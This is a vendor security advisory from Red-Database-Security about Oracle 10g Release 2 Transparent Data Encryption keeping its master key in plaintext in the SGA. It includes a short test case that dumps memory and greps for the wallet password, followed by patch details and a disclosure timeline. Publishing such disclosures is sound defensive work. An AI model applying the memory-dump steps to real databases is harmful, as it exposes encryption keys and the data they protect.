Services
Oracle Audit / Hardening
Security Training
Consulting

Information
Oracle Security Blog
Published AlertsRSS Published Alerts
Upcoming AlertsRSS Published Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts

News & Events
Events
News

Company
Contact
People
Partner
Impressum
Sitemap


Search



Search Red-Database-Security
Transparent Data Encryption stores key unencrypted in the SGA

Name Transparent Data Encryption stores key unencrypted in the SGA
Systems Affected Oracle Database 10g Release 2
Severity High Risk
Category Information disclosure
Vendor URL http://www.oracle.com/
Author Alexander Kornbrust (ak at red-database-security.com)
Date 17 January 2005 (V 1.00)
Oracle Bugno 5802173
Time to fix 190 days


Details
The Oracle security feature "Transparent Data Encryption" is storing the masterkey unencrypted
in the SGA. A skilled attacker or non-security DBA can retrieve the plaintext masterkey.

Test case
SQL> ALTER SYSTEM SET WALLET OPEN IDENTIFIED BY "secretpassword";

System altered.
SQL> exit
Disconnected from Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 
Production With the Partitioning, OLAP and Data Mining options


[oracle@ora10201 /]$ export DUMPSGA_DIR=/oracle/10.2.0/bin

[oracle@ora10201 /]$ cd /tmp

[oracle@ora10201 /]$ dumpsga 

[oracle@ora10201 /]$ strings * | grep -iH secretpassword 
secretpassword secretpassword secretpassword [] Excerpt from the SGA /oracle/10.2.0/admin/ora01/wallet/^@"[q^@^@d$d$^@?y*cle/10.2.0/admin/ora10201/wallet/^@^@^@^@^@^9^@^@0d$dd$-
^@^@0d$L4^L^Xp /]/<8f>^Dsecretpassword^@^M^U^B^@d$4^Lfile:/oracle/10.2.0/admin/ora10201/wallet []

Patch Information
Oracle fixed this issue with the patches from the critical patch update january 2006 for Oracle 10g Release 2.

History
11-jul-2005 Oracle secalert was informed
12-jul-2005 Bug confirmed
17-jan-2006 Oracle published the Critical Patch Update January 2006 (CPU January 2006)
17-jan-2006 Red-Database-Security published this advisory



2006 by Red-Database-Security GmbH - last update 17-jan-2006

Oracle Transparent Data Encryption (TDE)

Oracle Transparent Data Encryption enables you to encrypt data in columns without having to manage the encryption key. Businesses can protect sensitive data in their databases without having to make changes to their applications..

Oracle Transparent Data Encryption is a new feature of Oracle 10g Release 2 and part of the Oracle Advanced Security Option (ASO).